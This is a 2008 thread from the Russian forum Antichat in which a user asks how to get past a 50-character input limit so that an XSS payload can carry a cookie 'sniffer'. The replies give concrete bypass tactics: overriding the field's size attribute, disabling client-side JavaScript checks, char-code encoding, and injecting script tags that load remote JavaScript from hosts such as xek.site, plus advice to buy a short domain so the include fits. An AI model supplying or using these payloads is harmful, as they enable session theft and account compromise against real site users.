HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ОФФТОП > Болталка
Перезагрузить страницу Обход ограничений символов (xss) ?
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обход ограничений символов (xss) ?
  #1  
Старый 21.07.2008, 19:03
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию Обход ограничений символов (xss) ?
Вот есть поле, там работает алерт, но ввод символов ограничен...как можно обойти данное ограничение ? (для снифера)
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием

  #2  
Старый 21.07.2008, 19:12
Shred
Участник форума
Регистрация: 22.05.2006
Сообщений: 232
С нами: 10511126

Репутация: 73
По умолчанию
возможно ограничение реализовано путём выставления значения size, попробуй сохранить страницу, переопредели это значеие для уязвимого поля на более длинное, пропишу полнуй путь к скрипту и попробуй выполнить. Второй вариант, то что возможно проверка реализована только ява скриптом, нада либо найти это место и вырезать либо отключить выполнение жабаскрипта, но тогда ты сам не увидишь результат выполнения . Но это всё оочень мало вероятно и скорей всего проверка и на клиенте и на серванте
 
Ответить с цитированием

  #3  
Старый 21.07.2008, 19:30
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию
Цитата:
но ввод символов ограничен
И что мы под этим должны понимать? ограничение по размеру или фильтрация? а может поле заколдовано и на хакеров, пытаюшихся его заxssить наводится порча?
 
Ответить с цитированием

  #4  
Старый 21.07.2008, 19:42
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
С нами: 9443906

Репутация: 3313


По умолчанию
юзай кодировку в чарс
 
Ответить с цитированием

  #5  
Старый 21.07.2008, 19:43
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию
Код:
<script src="http://www.ya.ru/1.js"></script>
- короче ничего не знаю
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #6  
Старый 21.07.2008, 19:48
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,205
С нами: 10016425

Репутация: 1257


По умолчанию
инклудом
Цитата:
<SCRIPT SRC=http://xek.site/xss.js></SCRIPT>
 
Ответить с цитированием

  #7  
Старый 21.07.2008, 20:01
geforse
Постоянный
Регистрация: 02.03.2008
Сообщений: 893
С нами: 9574565

Репутация: 712


По умолчанию
в поле можно водить только 50 символов.
инклуд, самое оно но нужен короткий домен(
 
Ответить с цитированием

  #8  
Старый 21.07.2008, 20:17
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами: 11020706

Репутация: 4693


По умолчанию
Купи, трёхбуквенники ещё остались.
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[ Обзор Уязвимостей .:Drupal :. ] Cawabunga Веб-уязвимости 43 12.01.2021 19:31
Обход ограничений Fat32/ntfs (си) DaemoniZ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 8 03.05.2008 19:47
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Обход регистрации в Invision Power Board v1.3 Final DeeIP Уязвимости CMS / форумов 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.